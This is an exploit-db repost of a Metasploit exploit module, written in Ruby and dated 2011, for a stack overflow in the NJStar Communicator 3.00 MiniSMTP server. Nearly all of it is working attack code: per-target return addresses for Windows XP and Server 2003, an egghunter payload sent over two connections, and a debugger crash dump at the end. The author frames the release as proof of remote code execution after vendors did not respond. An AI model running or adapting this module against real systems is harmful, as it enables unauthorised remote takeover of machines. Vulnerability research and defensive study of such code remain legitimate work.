NJStar Communicator 3.00 – MiniSMTP Server Remote (Metasploit)

  • 作者: Dillon Beresford
    日期: 2011-10-31
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18057/
  • ##
# Exploit Title: NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
# Date: 10/31/2011
# Author: Dillon Beresford
# Twitter: https://twitter.com/#!/D1N
# Software Link: http://www.njstar.com/download/njcom.exe
# Version: 3.00 and prior
# Build: 11818 and prior 
# Tested on: Windows XP SP3/SP2/SP1 and Windows Server 2003 SP0
# CVE : NONE
# Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran, 
# manils, d0tslash, mublix, halsten, and everyone at AHA!
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# 
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'NJStar Communicator 3.00 MiniSMTP Server Remote Exploit',
			'Description'	=> %q{
					This module exploits a stack overflow vulnerability in NJStar Communicator 
					Version 3.00 MiniSMTP server.
			},
			'License'		=> MSF_LICENSE,
			'Author'		=>
				[
					'Dillon Beresford',	# Original discovery and MSF Module.
					'Corelan Team',	# tx for mona.py, all the tuts, and for being awesome. :)
				],
			'Version'		=> '$Revision:$',
			'References'	=>
				[
					[ 'OSVDB', '' ],
					[ 'CVE', '' ],
					[ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],
					[ 'URL', 'http://www.youtube.com/watch?v=KvkKX035484'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Platform'	=> 'win',
			'Payload'	=>
				{
'BadChars' => "\x00",
'StackAdjustment' => -1500,
				},

			'Targets'		=>
				[
					[ 'Windows XP SP3',
					{
'Ret' 	=>	0x7c874413,
'Offset'	=>	247,
					} # jmp esp kernel32.dll
			], 
			[ 'Windows XP SP2',
			{
			'Ret' => 0x77558952,
			'Offset'=> 247,
			} # jmp esp ntdll.dll
			],
			[ 'Windows XP SP1',
			{
			'Ret' => 0x77d718fc,
			'Offset'=> 247,
			} # jmp esp user32.dll
			],
			[ 'Windows Server 2003 SP0',
					{
'Ret' 	=>	0x71c033a0,
'Offset'	=>	247,
					} # jmp esp ntdll.dll
			],
				], # Feel free to add more targets.
			'Privileged'	=> false,
			'DisclosureDate'	=> 'OCT 31 2011',
			'DefaultTarget'	=> 0))

		register_options([Opt::RPORT(25)], self.class)

	end

	def exploit

eggoptions =
{
:checksum => true, 
:eggtag => "w00t"
}

badchars = '\x00' 
hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)

if target.name =~ /Windows XP SP3/

buffer =rand_text(target['Offset'])
buffer << [target.ret].pack('V') 
buffer << hunter
buffer << make_nops(4)

elsif target.name =~ /Windows XP SP2/

buffer =rand_text(target['Offset'])	
buffer << [target.ret].pack('V') 
buffer << hunter
buffer << make_nops(4)

elsif target.name =~ /Windows XP SP1/

buffer = rand_text(target['Offset'])
buffer << [target.ret].pack('V') 
buffer << hunter
buffer << make_nops(4)

elsif target.name =~ /Windows Server 2003 SP0/

buffer = rand_text(target['Offset'])
buffer << [target.ret].pack('V') 
buffer << hunter
buffer << make_nops(4)

end

# Just some debugging output so we can see lengths and byte size of each of our buffer.
print_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg))
print_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter))
print_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer))

print_status("Trying target #{target.name}...")

# har har har you get trick no treat... 
# we dont have very much space so we 
# send our egg in a seperate connection

connect

print_status("Sending the egg...")
sock.put(egg)

# I think you betta call, ghostbusters...
# now we send our evil buffer along with the
# egg hunter, we are doing multiple connections
# to solve the issue with limited stack space.
# thanks to bannedit for advice on threads and
# making multiple connections to get around 
# stack space constraints. :)

connect

print_status("Sending our buffer containing the egg hunter...")
sock.put(buffer)

		handler
		disconnect
	end
end

##
# No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded
# on 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability 
# is remotely exploitable and needed more verification. I sent a proof of concept exploit 
# in python with remote code execution. So, here is the proof that the bug is, in fact, 
# remotely exploitable. WIN!
##

##
# eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50
# edi=008a3d80
# eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc
# cs=001bss=0023ds=0023es=0023fs=003bgs=0000
# efl=00010206
# 42424242 ?????
# 0:003> !exchain
# image00400000+bbc4 (0040bbc4)
# 00ccff00: 41414141
# Invalid exception stack at 41414141
# 0:003> d esp
# 00ccff7044 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44DDDDDDDDDDDDDDDD
# 00ccff8044 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44DDDDDDDDDDDDDDDD
# 00ccff9044 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44DDDDDDDDDDDDDDDD
# 00ccffa044 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00DDDD......@. #A.
# 00ccffb000 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00........)..|.=..
# 00ccffc000 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f.........=......
# 00ccffd000 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff................
# 00ccffe0d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00...|0..|........
##